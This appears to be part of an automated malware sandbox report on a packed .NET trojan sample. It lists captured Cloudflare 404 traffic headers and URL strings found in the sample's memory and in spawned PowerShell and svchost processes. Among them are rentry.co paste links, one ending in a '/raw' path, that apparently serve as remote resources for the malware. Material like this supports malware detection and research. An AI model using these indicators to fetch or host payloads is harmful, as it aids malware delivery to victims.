              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7svEN%2BZ4Kl4sjMnfz6gdRXCjTbWWhBekoLj84zOROySQl7aQJXMYbPHtu3zOjoazw5ZGtPaQuvM5EGhdukX5CIthC3ZbtIfiZsgqwC%2Flt0ALf2%2BKUZZ%2F6NHQHg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ee7c0c08477c-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byYG5N8l%2BEKf6IZIhhlvg%2Fswi5fx1lgKQ9MvzB38ChHejlR%2BRnheWD%2BKlk1o6gawKFnzjsBKX0cysbWFs7YUL8iFqgQ8NaukKWWhIbMUsIaLXGJh5u6Jyc8QbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ee8739266bb0-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2BCKLPM95XtMS7AxT0EQjKorgl6EVYAHakE5lLjvrtRnO66PbZjTmqgUHd8ey%2FFscmW6So3dvMAE%2F2Kg4WYUUTG4vuKv5gzj3Ww3lPBrwaVWnJWv2K9gBNedNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ee8e18c14743-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FvKoj0i7cKoukELsCbhtny6r5wA4SJVYvZ%2B952AEWLbmDuv4%2FGf6K%2BIlH2KCenlw69M9PNtlJ4C8Trmrfj0byksZwP8GV876Sjhez2plRgSQ%2FWhUUF4CJPSnBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ee945d1945e3-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GgttGctQd87XSj6%2B2cmceVf5GULcRIA0O1r9L6MQtojxaZYn24CUxuXtC%2FF7%2Br3n%2BCuSXqUT4UyPgHvK4AMHl0lhsT10MQFgTGFMCY2tuonUXW9jFrxzM%2F1IGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ee9c6bdeeb37-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSDyI7ZwAZvsKwNMg%2F0XeVhrC%2FWq117F83VhHPOhfah4220b5WMLTFUaQxYNCsI0phSOgqGlhsz0cfbReCGw3OrN%2BkqaHt%2FwPua9prZiJetLDnGSy3uWHtrhfA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eea4fb56e9ce-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0KzVyXfp0FpIRfspOSTcpIagGKN9IRjcs02zQQ5na%2FV54OR8JdrJH6wMwFuZBY5DlvWLfDU76BGLh4PE86MLvxx%2Bm%2B4dFnYaIGcKBzSk7DOkhr123P2U3%2FGqQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eeac8d330bc7-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q3h90GKs1Bz5QQDZdksNDJALPXkR%2FWUFQKXZH%2BHHJ7guHDP3lE3Yp98%2F9r2c%2FVgTIIhRBFiy1hkjmuev3mej9xHd%2FygMdT%2F9DohKEK34MVgZEYD85kerq391rA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eeb28e04e942-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pojf5wWe%2BI9CFv2KHLbAdvLX8xkoN5oKQLGtKd6mRZn%2F1SIs0XPk%2BbSV1E2j8n5ROR0Nc0FfW9XFxz0eEhWHrRhpgVYK%2Bx6u54YjvTmOvSDqiVrqarhgy%2Fe%2F5g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eeb9ab036b51-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykmvK2%2FdrkpDlvdv%2BMh01NM39KLR8hZDdlzD3ijAWo5SkuSsUqL6Qvy5wh2avzvmvTqQ6xo1UXaScSNcVqW%2Fyr0x%2FP0B6hvVU%2FkjcETDOdPkv0Ow0dLgOwQKeQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eebfaea16bd2-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXvK49%2BIov94n2u9nHoT2rMXVZXb%2FxGxM0PEaXaQcwMIuKxBaI%2FjWXiO02ktxF1kwJpM3lPCMz3ytT0hKadO5aJ8o9wiu8bK4qaFeEvhccTSou5DDbQLTIuvTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eec719c9e7aa-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bjQ%2FbmZNAgQSb9sTyeGLTsN%2FA9nLSvvJOLoESREHoBqeG2jUTeC6%2BTyM3L6R6cGM3BMUqDqD3KsjXNBwn75lm3z9Ujpee6cQ5t28tiX100LS8X9ck4lfCwJOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eed11fdae7c3-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNbLVg7eYXvLSvgDiCbIQaXo6jbOHfVCnUSXkDxFC9Lu6lShAGvYDRPvwkEWUroDfGgJ%2F8v%2BsykNh8HffeC2KBMFtRoOzqOlWKJVenI8KXIb7gPKFyxvNly34w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eed74be93acf-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBvyzIO9cJxVQMYsg9k81213FTF2r2oZevdQcOfKGdKIQFXgzlOfWVPlveEfkU0mePUykUnnXpUAUxV7YH8XSAH1g6bb3qneih6Kerej1pTp4eCTOXTTar2d3Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eedd6b6d4612-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Utyrslh0KzGH%2FiytxKNPetzVUTPqm1w9%2FJToTqkZ36HX5ndeNHUNhJvWQHYYEJD%2Bno85g4%2BxFxrJJu7AaiWsPlIZI1tKhzSeZoQZDmcRZNHHrH75v1uU8BO1lw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eee38b00485b-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K3BzK1If%2FPhMVUlLvPAolCg4zs1LrnvjIB8oTdPkz6ruZ3Is44%2BOCTwq3SgiZs9zjsuGIIcg2Df7qUnhiWeQlnq1KNpLQPaxzeGC%2BPd0s3MjmG0MJtLgFmGn8g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eee9ba252cc6-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gc6pL0MTbAlr7v2bE3dOZxgv9LyhZCDZItFbEQ3s6yqnAQnKqDRWCdLHmKm40D1BzTyhK5VCJrO%2BeMKi5NNB3%2BtmvWrW7IPb0yUp1LLDcWpcHO6ZUQ3iWrJZQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eeeff84c6bcb-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GUApYDG0RIebHCxLET8wv81VQOIXfrGIW7Hnn%2BWuVZwssFrpXSuNpmgTrYPYjz7OMu%2FgqURhxT10y7knslq%2B3jH8bvsHu%2BKjsq3Y5MKKqo4ZboJja0T9iPrdg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eef62db31448-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqtWsYuJ2ojEqB%2Fu9ltrCzkaBjc%2BTMEhgtmCc8l0vYqJKPP5sMfWOvk21z5QNMWynTgCARdCjN7FxK5aCSSMFN5JXiodMImsIjgL%2B%2Fv8MWQRbiE6lHrjqem5TA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47eeff4f5ee84b-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01jMqV3lW1H4KghzbtIxu8Cmk%2BVJupY4zg%2FMC%2FmSLgg3c%2Fju8c1fgUg8YXHma23JGndNi4Do8nFxxuwddWQ0nsO8HKIIkOp0%2BUSH8kabeGSLIFcuyVctNtqCHg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ef099fe1e7f3-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nOaO8J%2F8K4eSL0it%2Fs5Ox3jNqwQhWvDSpl5jmb%2Fv17VVGEDQJDiOZ%2BLcooIKANDUAbcrzR4GRqxToNexgU%2FPd6p46fFe2eFTpRy6wWrBzsCG4AaBZdnsSAtE5g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ef0fe9332ccc-DFW
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ADSXGFPqENSfOzgyaDi7szTDtulwFmHArXpQzx4HZc9jbFUkT%2BEakLD%2FHi0HkCt1LDOjtbHduUWE3xKMfuv0PUSy4duw%2F%2F2%2BBkSQRQNs%2BzDdxlzgEOTZN3Cgfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d47ef1a4fc5e987-DFW
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: powershell.exe, 0000000B.00000002.2529840862.00000000077BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
              Source: powershell.exe, 00000002.00000002.2375364868.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: powershell.exe, 00000002.00000002.2372879688.0000000005B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2416953557.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2463060306.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: powershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.co
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.cod
              Source: powershell.exe, 00000002.00000002.2366232332.0000000004C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004D37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2366232332.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2366232332.0000000004C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004D37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: Amcache.hve.26.drString found in binary or memory: http://upx.sf.net
              Source: powershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2366232332.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2407698391.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2449207017.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000B.00000002.2500442683.0000000005117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000B.00000002.2500442683.000000000591D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2500442683.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2364873331.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5x
              Source: powershell.exe, 00000002.00000002.2372879688.0000000005B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2416953557.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2463060306.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2519692026.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.00000000029FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/8wum7vH
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/8wum7vHv
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://rentry.co/8wum7vax/raw
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/8wum7vax/rawT
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.png
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.png
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
